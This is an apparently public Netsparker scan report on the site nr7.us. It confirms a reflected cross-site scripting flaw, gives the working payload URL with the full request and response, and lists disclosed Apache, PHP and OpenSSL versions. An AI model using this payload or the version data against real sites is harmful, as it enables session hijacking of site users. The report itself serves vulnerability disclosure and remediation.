XSS, nr7.us, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers



Loading

Netsparker - Scan Report Summary
TARGET URL
https://nr7.us/apps/?p=4154
SCAN DATE
6/17/2011 10:19:41 AM
REPORT DATE
6/17/2011 10:21:56 AM
SCAN DURATION
00:00:14

Total Requests

Average Speed

req/sec.
5
identified
1
confirmed
0
critical
0
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
20 %
LOW
80 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
/apps/ p GET Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /apps/

/apps/ CONFIRMED

https://nr7.us/apps/?p='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00002F)%3C/script%3E

Parameters

Parameter Type Value
p GET '"--></style></script><script>alert(0x00002F)</script>

Request

GET /apps/?p='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002F)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: nr7.us
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 15:19:46 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Cache-Control: private, no-cache, no-store, no-cache="Set-Cookie", proxy-revalidate
Expires: Fri, 04 Aug 1978 12:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 1487
Connection: close
Content-Type: text/html


/* Copyright Forward I.T. Solutions, LLC d/b/a Net-Results.An unpublished work created in 2009. All rights reserved. This softwarecontains the confidential and trade secret information of Forward I.T.Solutions, LLC d/b/a Net-Results ("Net-Results"). Copying,distribution or disclosure without Net-Results' express writtenpermission is prohibited*/function nr_apps_capture(l) { var d = document; var vid = nr_apps_get_vid(); var im=new Image(1,1); im.onload = function() { fake_load(); } im.src='http'+(d.URL.indexOf('https:')==0?'s://':'://')+'nr7.us'+'/apps/c.php?l='+l+'&u='+escape(d.location)+'&r='+escape(d.referrer)+'&p='"--></style></script><script>netsparker(0x00002F)</script>&vid='+vid+__nrAppsDf()+'&t='+new Date().getTime();}function __nrAppsDf() { var dl = document.location; var f=dl.hash; var eC=encodeURIComponent; var uC=decodeURIComponent; if(f.match(/^#/)) { var hof; if(hof=/^#(.*)#li=(.+)&cs=(.+)/.exec(f)) { dl.hash=hof[1]; return '&li='+eC(uC(hof[2]))+'&cs='+eC(uC(hof[3])); } else if (hof=/^#li=(.+)&cs=(.+)/.exec(f)) { dl.hash=''; return '&li='+eC(uC(hof[1]))+'&cs='+eC(uC(hof[2])); } } return '';}function fake_load() { return;}function nr_apps_get_vid() { var vid = null; var d = document; var dc = d.cookie; if(dc && dc.length >0) { var ca=dc.split(';'); for(var i=0;i<ca.length;i++) { var x=ca[i].indexOf('='); var k=ca[i].substring(0,x); var v=ca[i].substring(x+1); if(k==' __nrvid'||k=='__nrvid'){ vid=v; } } } if(!vid) { pvid = window.name; if(pvid.match('__nr__')) { var vstring = pvid.replace(/__nr__/g, ''); var varr = vstring.split('.'); vid = varr[0]; pid = varr[1]; if(pid != '"--></style></script><script>netsparker(0x00002F)</script>) { vid = 66039027; } }else{ vid = 66039027; } var cd = []; var fd = document.domain; var arrFd = fd.split('.').reverse(); for(var b=0;b<arrFd.length;b++) { var a = []; for(var j=0;j<=b;j++) { a.push(arrFd[j]) } cd.push(a.reverse().join('.')) } var cdt = new Date(); cdt.setFullYear(cdt.getFullYear()+2); var expires = '; expires='+cdt.toUTCString(); for(var e=0;e<cd.length;e++) { document.cookie = '__nrvid='+vid+expires+'; path=/;domain=.'+cd[e]+';'; } window.name = '__nr__'+vid+'.'+'"--></style></script><script>netsparker(0x00002F)</script>+'__nr__'; } return vid;}function __nrAddDocsListener() { var a=document.getElementsByTagName('a'),l=a.length; for (var i=0;i<l;i++) { __nrAddEvent(a[i], 'click', nr_apps_docs_capture); }}function __nrAddEvent(e, t, f) { if (e.attachEvent) { e.attachEvent('on'+t, f); } else { e.addEventListener(t, f, true); }}function nr_apps_docs_capture(evt) { if (!evt) { var evt = window.event; } var types = ['xls','pdf','doc','zip', 'ppt', 'pptx']; var ext,i,href,e; if (evt.srcElement) { href=evt.srcElement.href; }else if(evt.currentTarget){ href=evt.currentTarget.href; } if (typeof(href)!='undefined'&&href&&href!='') { if(e=/^.+\.(.+)$/.exec(href)) { ext = e[1].toLowerCase(); for(i=0;i<types.length;i++) { if(types[i]==ext) { nr_apps_capture(escape(href)); break; } } } else if (e=/^http:\/\/(.*)\.youtube\.com.+$/.exec(href)) { } }}__nrAddDocsListener();
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

https://nr7.us/

Extracted Version

2.2.8 (Ubuntu)

Request

GET / HTTP/1.1
Referer: https://nr7.us/apps/?p=4154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: nr7.us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 15:19:40 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html


PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

https://nr7.us/

Extracted Version

PHP/5.2.4

Request

GET / HTTP/1.1
Referer: https://nr7.us/apps/?p=4154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: nr7.us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 15:19:40 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html


OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

https://nr7.us/

Extracted Version

OpenSSL/0.9.8g

Request

GET / HTTP/1.1
Referer: https://nr7.us/apps/?p=4154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: nr7.us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 15:19:40 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html


Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

https://nr7.us/

Extracted Version

mod_ssl/2.2.8 OpenSSL/0.9.8g

Request

GET / HTTP/1.1
Referer: https://nr7.us/apps/?p=4154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: nr7.us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 15:19:40 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Connection: close
Content-Type: text/html